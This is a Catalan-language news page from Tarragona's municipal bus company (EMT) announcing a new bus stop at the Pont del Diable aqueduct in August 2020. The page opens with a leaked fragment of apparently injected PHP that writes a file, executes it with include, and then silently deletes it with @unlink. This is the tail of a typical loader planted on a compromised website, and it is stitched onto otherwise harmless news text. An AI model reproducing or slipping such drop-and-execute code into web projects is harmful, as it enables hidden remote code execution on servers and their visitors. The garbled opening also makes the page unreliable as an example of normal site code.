");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Entra en funcionament la nova parada d'autobús del Pont del Diable a Tarragona
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Entra en funcionament la nova parada d'autobús del Pont del Diable a Tarragona (03/08/2020)

L’Empresa Municipal de Transports (EMT) ha posat en funcionament la nova parada d’autobús del Pont del Diable. La parada està ara ubicada a tres metres de distància de la CN-240, a l’entrada del camí d’accés del Pont del Diable, i s’ha aprofitat la illeta ja existent d’ordenació dels carrils d’entrada i sortida a l’aqüeducte per obrir un vial exclusiu per als autobusos que hi fan parada.

A més de l’obertura del vial, s’ha pavimentat l’accés a la parada i la illeta, s’hi ha instaŀlat una marquesina i s’ha definit un camí d’accés per a vianants adjacent a la calçada que porta a l’aparcament del Pont del Diable.

La totalitat de les obres s’ha realitzat en terrenys públics i ha comptat amb un pressupost de 25.000 euros.

“Amb la posada en funcionament de la nova parada donem resposta a una reivindicació ciutadana que ve d’anys. Hem millorat la seguretat i accessibilitat de la parada i l’hem dotat dels elements i mobiliari urbà necessari per tal de garantir la mobilitat de vehicles i persones a la zona”, explica el president de l’EMT, Jordi Fortuny.

Font: Ajuntament de Tarragona

Entra en funcionament la nova parada d'autobús del Pont del Diable a Tarragona

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona